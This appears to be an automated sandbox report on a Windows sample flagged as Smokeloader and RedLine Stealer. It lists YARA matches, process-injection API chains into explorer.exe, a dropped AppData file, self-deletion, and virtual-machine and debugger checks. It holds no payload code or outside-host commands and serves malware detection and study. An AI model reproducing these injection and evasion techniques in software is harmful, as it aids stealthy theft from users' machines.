    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
    Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
    Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

    System Summary

    barindex
    Source: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
    Source: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401514
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,0_2_00402F97
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401542
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,0_2_00403247
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401549
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,0_2_0040324F
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,0_2_00403256
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_00401557
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,0_2_0040326C
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,0_2_00403277
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,0_2_004014FE
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,0_2_00403290
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401514
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,5_2_00402F97
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401542
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,5_2_00403247
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401549
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,5_2_0040324F
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,5_2_00403256
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_00401557
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,5_2_0040326C
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,5_2_00403277
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_004032C7 CreateFileW,GetForegroundWindow,NtEnumerateKey,wcsstr,5_2_004032C7
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,5_2_004014FE
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,5_2_00403290
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_004155300_2_00415530
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_004155305_2_00415530
    Source: K80v6DHFHE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: 00000000.00000002.1931909855.0000000002B7D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: 00000000.00000002.1931965782.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1931984278.0000000002C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.2220751054.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
    Source: 00000000.00000002.1932109842.00000000046A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.2220908287.0000000002DC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.2220782028.0000000002C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
    Source: 00000005.00000002.2221046473.0000000002DFC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
    Source: K80v6DHFHE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: wafguag.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: classification engineClassification label: mal100.troj.evad.winEXE@3/2@6/2
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_02B8016D CreateToolhelp32Snapshot,Module32First,0_2_02B8016D
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wafguagJump to behavior
    Source: K80v6DHFHE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: K80v6DHFHE.exeReversingLabs: Detection: 39%
    Source: K80v6DHFHE.exeVirustotal: Detection: 41%
    Source: unknownProcess created: C:\Users\user\Desktop\K80v6DHFHE.exe "C:\Users\user\Desktop\K80v6DHFHE.exe"
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\wafguag C:\Users\user\AppData\Roaming\wafguag
    Source: unknownProcess created: C:\Users\user\AppData\Roaming\wafguag C:\Users\user\AppData\Roaming\wafguag
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagSection loaded: msimg32.dllJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagSection loaded: msvcr100.dllJump to behavior
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeUnpacked PE file: 0.2.K80v6DHFHE.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.dazit:W;.xepegi:W;.rsrc:R; vs .text:EW;
    Source: C:\Users\user\AppData\Roaming\wafguagUnpacked PE file: 5.2.wafguag.400000.0.unpack .text:ER;.rdata:R;.data:W;.dazit:W;.xepegi:W;.rsrc:R; vs .text:EW;
    Source: K80v6DHFHE.exeStatic PE information: section name: .dazit
    Source: K80v6DHFHE.exeStatic PE information: section name: .xepegi
    Source: wafguag.1.drStatic PE information: section name: .dazit
    Source: wafguag.1.drStatic PE information: section name: .xepegi
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_004014D9 pushad ; ret 0_2_004014E9
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_004031DB push eax; ret 0_2_004032AB
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_02B83BC6 push esp; ret 0_2_02B83BC8
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_02B81F69 push B63524ADh; retn 001Fh0_2_02B81FA0
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_02B82A66 pushfd ; iretd 0_2_02B82A67
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeCode function: 0_2_02C71540 pushad ; ret 0_2_02C71550
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_004014D9 pushad ; ret 5_2_004014E9
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_004031DB push eax; ret 5_2_004032AB
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_02C81540 pushad ; ret 5_2_02C81550
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_02E020FE pushfd ; iretd 5_2_02E020FF
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_02E0325E push esp; ret 5_2_02E03260
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_02E01601 push B63524ADh; retn 001Fh5_2_02E01638
    Source: C:\Users\user\AppData\Roaming\wafguagCode function: 5_2_02E07399 push ebp; retf 5_2_02E0739A
    Source: K80v6DHFHE.exeStatic PE information: section name: .text entropy: 7.534628882954891
    Source: wafguag.1.drStatic PE information: section name: .text entropy: 7.534628882954891
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wafguagJump to dropped file
    Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\wafguagJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\k80v6dhfhe.exeJump to behavior
    Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\wafguag:Zone.Identifier read attributes | deleteJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Roaming\wafguagAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Roaming\wafguagAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: wafguag, 00000005.00000002.2220941358.0000000002DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 385Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1153Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 611Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3986Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 893Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 853Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5964Thread sleep count: 385 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 2424Thread sleep count: 1153 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 2424Thread sleep time: -115300s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 2212Thread sleep count: 611 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 2212Thread sleep time: -61100s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 1868Thread sleep count: 280 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5608Thread sleep count: 320 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 5608Thread sleep time: -32000s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 3688Thread sleep count: 268 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 2424Thread sleep count: 3986 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 2424Thread sleep time: -398600s >= -30000sJump to behavior
    Source: explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1897951937.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
    Source: explorer.exe, 00000001.00000000.1897951937.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
    Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
    Source: explorer.exe, 00000001.00000000.1914734952.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
    Source: explorer.exe, 00000001.00000000.1894676712.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: explorer.exe, 00000001.00000000.1914734952.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
    Source: explorer.exe, 00000001.00000000.1894676712.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
    Source: explorer.exe, 00000001.00000000.1897951937.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
    Source: explorer.exe, 00000001.00000000.1897951937.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1897951937.00000000097D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: explorer.exe, 00000001.00000000.1914734952.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: explorer.exe, 00000001.00000000.1894676712.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
    Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: explorer.exe, 00000001.00000000.1897951937.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
    Source: explorer.exe, 00000001.00000000.1892315703.0000000001248000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\K80v6DHFHE.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\wafguagProcess queried: DebugPortJump to behavior
